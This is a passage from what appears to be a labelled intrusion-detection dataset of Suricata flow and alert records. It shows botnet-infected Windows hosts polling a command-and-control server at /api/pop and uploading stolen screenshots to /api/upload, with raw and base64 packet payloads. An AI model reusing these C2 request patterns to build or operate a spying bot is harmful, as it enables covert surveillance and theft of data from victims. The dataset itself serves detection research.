keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.18.1\r\nContent-Length: 57318\r\nContent-Type: multipart/form-data; boundary=4febb587bbce4febb8e65c6e36950c90\r\n\r\n--4febb587bbce4febb8e65c6e36950c90\r\nContent-Disposition: form-data; name="src"\r\n\r\nwbzVJ.jpg\r\n--4febb587bbce4febb8e65c6e36950c90\r\nContent-Disposition: form-data; name="botid"\r\n\r\nmitacs-pc5\r\n--4febb587bbce4febb8e65c6e36950c90\r\nContent-Disposition: form-data; name="uploaded"; filename="wbzVJ.jpg"\r\n\r\n......JFIF.............C..............\n..\r................. $.\' ",#..(7),01444.\'9=82<.342...C........\r\r.2!.!22222222222222222222222222222222222222222222222222..........."......................................\n.....................}........!1A..Qa."q.2....#B...R..$3br..\n.....%&\'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz........................................................................................................\n.....................w.......!1..AQ.aq."2...B.....#3R..br.\n.$4.%.....&\'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..j(..\n(.......t.&..1%.....=.A..?.D.F..]...*N..t..N........5.6..$...C..........,,...}.A.K#....$.rx...%.+z.$.j-?5.5..|K....g..2......b......p..@$..j.k..y;g..t.......r....=8...E.+.....2....E$.....$....)^G...bph.\'...].y2yb/.....w...F3.1...6(../_.T.5;.....e.....8(.....[......M.)...', 'stream': 1, 'packet': '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', 'packet_info': {'linktype': 1}} | 509 | attack | 1,249,362 |
192.168.10.15-52261-205.174.165.73-8080-6 | ['flow', 'http', 'fileinfo'] | event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 6, flow_pkts_toclient: 5, flow_bytes_toserver: 555, flow_bytes_toclient: 433, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 4494191, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010, http_http_user_agent: python-requests/2.14.2, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 10 ; pcap_cnt: 4494193, event_type: fileinfo, proto: TCP, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010, http_http_user_agent: python-requests/2.14.2, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 10, app_proto: http, fileinfo_filename: /api/pop, fileinfo_gaps: False, fileinfo_state: CLOSED, fileinfo_stored: False, fileinfo_size: 10, fileinfo_tx_id: 0 | true | Botnet | true | 13:26:41 | 204,136 | Friday | [{'timestamp': '2017-07-07T13:26:41.990913+0000', 'flow_id': 669862629279546, 'pcap_cnt': 4494191, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52261, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 10, 'http_response_body_printable': 'screenshot', 'http_response_body': 'c2NyZWVuc2hvdA=='}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 4, 'bytes_toserver': 435, 'bytes_toclient': 373, 'start': '2017-07-07T13:26:41.788282+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAobuJAAIAGTj7AqAoPza6lScwlH5CYpWTWdF/Ef1AQAQBPFAAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:26:41.990913+0000', 'flow_id': 669862629279546, 'pcap_cnt': 4494191, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52261, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 10, 'http_response_body_printable': 'screenshot', 'http_response_body': 'c2NyZWVuc2hvdA=='}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 4, 'bytes_toserver': 435, 'bytes_toclient': 373, 'start': '2017-07-07T13:26:41.788282+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAobuJAAIAGTj7AqAoPza6lScwlH5CYpWTWdF/Ef1AQAQBPFAAAAAAAAAAA', 'packet_info': {'linktype': 1}}] | 507 | attack | 1,249,413 |
192.168.10.15-52262-205.174.165.73-8080-6 | ['flow', 'http', 'fileinfo'] | event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 22, flow_pkts_toclient: 31, flow_bytes_toserver: 66141, flow_bytes_toclient: 1988, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: ET.formdata, metadata_flowbits_1: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 13, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 4494312, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: ET.formdata, metadata_flowbits_1: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/upload, http_http_user_agent: python-requests/2.14.2, http_http_content_type: text/html, http_http_method: POST, http_protocol: HTTP/1.1, http_status: 200, http_length: 0 ; event_type: fileinfo, proto: TCP, metadata_flowbits_0: ET.formdata, metadata_flowbits_1: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/upload, http_http_user_agent: python-requests/2.14.2, http_http_content_type: text/html, http_http_method: POST, http_protocol: HTTP/1.1, http_status: 200, http_length: 0, app_proto: http, fileinfo_filename: EcoiM.jpg, fileinfo_gaps: False, fileinfo_state: TRUNCATED, fileinfo_stored: False, fileinfo_size: 5246, fileinfo_tx_id: 0 | true | Botnet | true | 13:26:42 | 85,640 | Friday | {'timestamp': '2017-07-07T13:26:42.112989+0000', 'flow_id': 219191711019852, 'pcap_cnt': 4494260, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52262, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['ET.formdata', 'http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/upload', 'http_user_agent': 'python-requests/2.14.2', 'http_method': 'POST', 'protocol': 'HTTP/1.1', 'length': 0, 'http_request_body_printable': '--e512c83b01794939862cb97d2d4c2ad2\r\nContent-Disposition: form-data; name="src"\r\n\r\nEcoiM.jpg\r\n--e512c83b01794939862cb97d2d4c2ad2\r\nContent-Disposition: form-data; name="botid"\r\n\r\nmitacs-pc4\r\n--e512c83b01794939862cb97d2d4c2ad2\r\nContent-Disposition: form-data; name="uploaded"; filename="EcoiM.jpg"\r\n\r\n......JFIF.............C..............\n..\r................. $.\' ",#..(7),01444.\'9=82<.342...C........\r\r.2!.!22222222222222222222222222222222222222222222222222..........."......................................\n.....................}........!1A..Qa."q.2....#B...R..$3br..\n.....%&\'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz........................................................................................................\n.....................w.......!1..AQ.aq."2...B.....#3R..br.\n.$4.%.....&\'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..j(..\n(.]_\\..+D/-...Lj.......zV.h{^oy++.cZ......hu.W...[..b7..G7"6`.Q..P~.k.f\n..p.x.?...{.W....\n5........T......|....0.}..6cq8..JC..y+*.....$N...7..p.|b.6/QTN.b.<.8...HF*..W,..r1.4.v...r..$~\\..:2......N.(...I5k)..#..P.&\n.8..0F{.9....../..D. [email protected]@.Obp\r.]..(...(...(...(...(...', 'http_request_body': 'LS1lNTEyYzgzYjAxNzk0OTM5ODYyY2I5N2QyZDRjMmFkMg0KQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kYXRhOyBuYW1lPSJzcmMiDQoNCkVjb2lNLmpwZw0KLS1lNTEyYzgzYjAxNzk0OTM5ODYyY2I5N2QyZDRjMmFkMg0KQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kYXRhOyBuYW1lPSJib3RpZCINCg0KbWl0YWNzLXBjNA0KLS1lNTEyYzgzYjAxNzk0OTM5ODYyY2I5N2QyZDRjMmFkMg0KQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kYXRhOyBuYW1lPSJ1cGxvYWRlZCI7IGZpbGVuYW1lPSJFY29pTS5qcGciDQoNCv/Y/+AAEEpGSUYAAQEAAAEAAQAA/9sAQwAIBgYHBgUIBwcHCQkICgwUDQwLCwwZEhMPFB0aHx4dGhwcICQuJyAiLCMcHCg3KSwwMTQ0NB8nOT04MjwuMzQy/9sAQwEJCQkMCwwYDQ0YMiEcITIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy/8AAEQgEAAUAAwEiAAIRAQMRAf/EAB8AAAEFAQEBAQEBAAAAAAAAAAABAgMEBQYHCAkKC//EALUQAAIBAwMCBAMFBQQEAAABfQECAwAEEQUSITFBBhNRYQcicRQygZGhCCNCscEVUtHwJDNicoIJChYXGBkaJSYnKCkqNDU2Nzg5OkNERUZHSElKU1RVVldYWVpjZGVmZ2hpanN0dXZ3eHl6g4SFhoeIiYqSk5SVlpeYmZqio6Slpqeoqaqys7S1tre4ubrCw8TFxsfIycrS09TV1tfY2drh4uPk5ebn6Onq8fLz9PX29/j5+v/EAB8BAAMBAQEBAQEBAQEAAAAAAAABAgMEBQYHCAkKC//EALURAAIBAgQEAwQHBQQEAAECdwABAgMRBAUhMQYSQVEHYXETIjKBCBRCkaGxwQkjM1LwFWJy0QoWJDThJfEXGBkaJicoKSo1Njc4OTpDREVGR0hJSlNUVVZXWFlaY2RlZmdoaWpzdHV2d3h5eoKDhIWGh4iJipKTlJWWl5iZmqKjpKWmp6ipqrKztLW2t7i5usLDxMXGx8jJytLT1NXW19jZ2uLj5OXm5+jp6vLz9PX29/j5+v/aAAwDAQACEQMRAD8A9GooooAKKK5dX1y48StELy3jjh5MasCCp/2epP16VvRoe15veSsr6mNat7Ll0bu7aHUUVy7Prlv4lWI3lvJHNyI2YABR/s9Qfp1rp2YKpY5wBngZP5UV6HsuV8yd1fQKNb2t1ZqztqLRVL+1rPyWl3yABxGUMLh92M42Y3E456dKQ6vZeSsqyO6szKAkTs3ynDfKBnAPfGKwNi9RVE6vYi48jziX3KpIRioLAFcsBgZyMc80unaimoxyusckflyMhDoy5wSM8genTt0oAu0VSTVrKRsLI+CwUMYmCtk4BBIwRnuOOR6ig6rZjy/3jESDIKxsQBnAYkDhT2JwDQBdooooAKKKKACiiigAooooAKKKKACiig=='}, 'files': [{'filename': 'EcoiM.jpg', 'sid': [], 'gaps': False, 'state': 'UNKNOWN', 'stored': False, 'size': 865, 'tx_id': 0}], 'app_proto': 'http', 'flow': {'pkts_toserver': 5, 'pkts_toclient': 2, 'bytes_toserver': 9048, 'bytes_toclient': 126, 'start': '2017-07-07T13:26:42.111436+0000'}, 'payload': 'UE9TVCAvYXBpL3VwbG9hZCBIVFRQLzEuMQ0KSG9zdDogMjA1LjE3NC4xNjUuNzM6ODA4MA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpBY2NlcHQ6ICovKg0KVXNlci1BZ2VudDogcHl0aG9uLXJlcXVlc3RzLzIuMTQuMg0KQ29udGVudC1MZW5ndGg6IDY0NjYxDQpDb250ZW50LVR5cGU6IG11bHRpcGFydC9mb3JtLWRhdGE7IGJvdW5kYXJ5PWU1MTJjODNiMDE3OTQ5Mzk4NjJjYjk3ZDJkNGMyYWQyDQoNCi0tZTUxMmM4M2IwMTc5NDkzOTg2MmNiOTdkMmQ0YzJhZDINCkNvbnRlbnQtRGlzcG9zaXRpb246IGZvcm0tZGF0YTsgbmFtZT0ic3JjIg0KDQpFY29pTS5qcGcNCi0tZTUxMmM4M2IwMTc5NDkzOTg2MmNiOTdkMmQ0YzJhZDINCkNvbnRlbnQtRGlzcG9zaXRpb246IGZvcm0tZGF0YTsgbmFtZT0iYm90aWQiDQoNCm1pdGFjcy1wYzQNCi0tZTUxMmM4M2IwMTc5NDkzOTg2MmNiOTdkMmQ0YzJhZDINCkNvbnRlbnQtRGlzcG9zaXRpb246IGZvcm0tZGF0YTsgbmFtZT0idXBsb2FkZWQiOyBmaWxlbmFtZT0iRWNvaU0uanBnIg0KDQr/2P/gABBKRklGAAEBAAABAAEAAP/bAEMACAYGBwYFCAcHBwkJCAoMFA0MCwsMGRITDxQdGh8eHRocHCAkLicgIiwjHBwoNyksMDE0NDQfJzk9ODI8LjM0Mv/bAEMBCQkJDAsMGA0NGDIhHCEyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMv/AABEIBAAFAAMBIgACEQEDEQH/xAAfAAABBQEBAQEBAQAAAAAAAAAAAQIDBAUGBwgJCgv/xAC1EAACAQMDAgQDBQUEBAAAAX0BAgMABBEFEiExQQYTUWEHInEUMoGRoQgjQrHBFVLR8CQzYnKCCQoWFxgZGiUmJygpKjQ1Njc4OTpDREVGR0hJSlNUVVZXWFlaY2RlZmdoaWpzdHV2d3h5eoOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExcbHyMnK0tPU1dbX2Nna4eLj5OXm5+jp6vHy8/T19vf4+fr/xAAfAQADAQEBAQEBAQEBAAAAAAAAAQIDBAUGBwgJCgv/xAC1EQACAQIEBAMEBwUEBAABAncAAQIDEQQFITEGEkFRB2FxEyIygQgUQpGhscEJIzNS8BVictEKFiQ04SXxFxgZGiYnKCkqNTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqCg4SFhoeIiYqSk5SVlpeYmZqio6Slpqeoqaqys7S1tre4ubrCw8TFxsfIycrS09TV1tfY2dri4+Tl5ufo6ery8/T19vf4+fr/2gAMAwEAAhEDEQA/APRqKKKACiiuXV9cuPErRC8t444eTGrAgqf9nqT9elb0aHteb3krK+pjWrey5dG7u2h1FFcuz65b+JViN5byRzciNmAAUf7PUH6da6dmCqWOcAZ4GT+VFeh7LlfMndX0CjW9rdWas7ai0VS/taz8lpd8gAcRlDC4fdjONmNxOOenSkOr2XkrKsjurMygJE7N8pw3ygZwD3xisDYvUVROr2IuPI84l9yqSEYqCwBXLAYGcjHPNLp2opqMcrrHJH5cjIQ6MucEjPIHp07dKALtFUk1aykbCyPgsFDGJgrZOAQSMEZ7jjkeooOq2Y8v94xEgyCsbEAZwGJA4U9icA0AXaKKKACiiigAooooAKKKKACiiigAooo=', 'payload_printable': 'POST /api/upload HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\nContent-Length: 64661\r\nContent-Type: multipart/form-data; boundary=e512c83b01794939862cb97d2d4c2ad2\r\n\r\n--e512c83b01794939862cb97d2d4c2ad2\r\nContent-Disposition: form-data; name="src"\r\n\r\nEcoiM.jpg\r\n--e512c83b01794939862cb97d2d4c2ad2\r\nContent-Disposition: form-data; name="botid"\r\n\r\nmitacs-pc4\r\n--e512c83b01794939862cb97d2d4c2ad2\r\nContent-Disposition: form-data; name="uploaded"; filename="EcoiM.jpg"\r\n\r\n......JFIF.............C..............\n..\r................. $.\' ",#..(7),01444.\'9=82<.342...C........\r\r.2!.!22222222222222222222222222222222222222222222222222..........."......................................\n.....................}........!1A..Qa."q.2....#B...R..$3br..\n.....%&\'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz........................................................................................................\n.....................w.......!1..AQ.aq."2...B.....#3R..br.\n.$4.%.....&\'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..j(..\n(.]_\\..+D/-...Lj.......zV.h{^oy++.cZ......hu.W...[..b7..G7"6`.Q..P~.k.f\n..p.x.?...{.W....\n5........T......|....0.}..6cq8..JC..y+*.....$N...7..p.|b.6/QTN.b.<.8...HF*..W,..r1.4.v...r..$~\\..:2......N.(...I5k)..#..P.&\n.8..0F{.9....../..D. [email protected]@.Obp\r.]..(...(...(...(...(...', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAuQbuxAAIAGQszAqAoPza6lScwmH5CV2ciuCOMoxFAQAQBJMgAAw/xoAp0Vc/sq9/54/wDjw/xo/sq9/wCeP/jw/wAaAKdFXP7Kvf8Anj/48P8AGj+yr3/nj/48P8aAKdFXP7Kvf+eP/jw/xo/sq9/54/8Ajw/xoAp0Vc/sq9/54/8Ajw/xo/sq9/54/wDjw/xoAp0Vc/sq9/54/wDjw/xo/sq9/wCeP/jw/wAaAKdFXP7Kvf8Anj/48P8AGj+yr3/nj/48P8aAKdFXP7Kvf+eP/jw/xo/sq9/54/8Ajw/xoAp0Vc/sq9/54/8Ajw/xo/sq9/54/wDjw/xoAp0Vc/sq9/54/wDjw/xo/sq9/wCeP/jw/wAaAKdFXP7Kvf8Anj/48P8AGj+yr3/nj/48P8aAKdFXP7Kvf+eP/jw/xo/sq9/54/8Ajw/xoAp0Vc/sq9/54/8Ajw/xo/sq9/54/wDjw/xoAp0Vc/sq9/54/wDjw/xo/sq9/wCeP/jw/wAaAKdFXP7Kvf8Anj/48P8AGj+yr3/nj/48P8aAKdFXP7Kvf+eP/jw/xo/sq9/54/8Ajw/xoAp0Vc/sq9/54/8Ajw/xo/sq9/54/wDjw/xoAp0Vc/sq9/54/wDjw/xo/sq9/wCeP/jw/wAaAKdFXP7Kvf8Anj/48P8AGj+yr3/nj/48P8aAKdFXP7Kvf+eP/jw/xo/sq9/54/8Ajw/xoAp0Vc/sq9/54/8Ajw/xo/sq9/54/wDjw/xoAp0Vc/sq9/54/wDjw/xo/sq9/wCeP/jw/wAaAKdFXP7Kvf8Anj/48P8AGj+yr3/nj/48P8aAM26thdQGIu6fMrBkxkFWDDqCOoFVn0pZ3j+13M11HG24RTJGVJwRyAoz1Nbf9lXv/PH/AMeH+NH9lXv/ADx/8eH+NAFOirn9lXv/ADx/8eH+NH9lXv8Azx/8eH+NAFOirn9l3n/PH/x4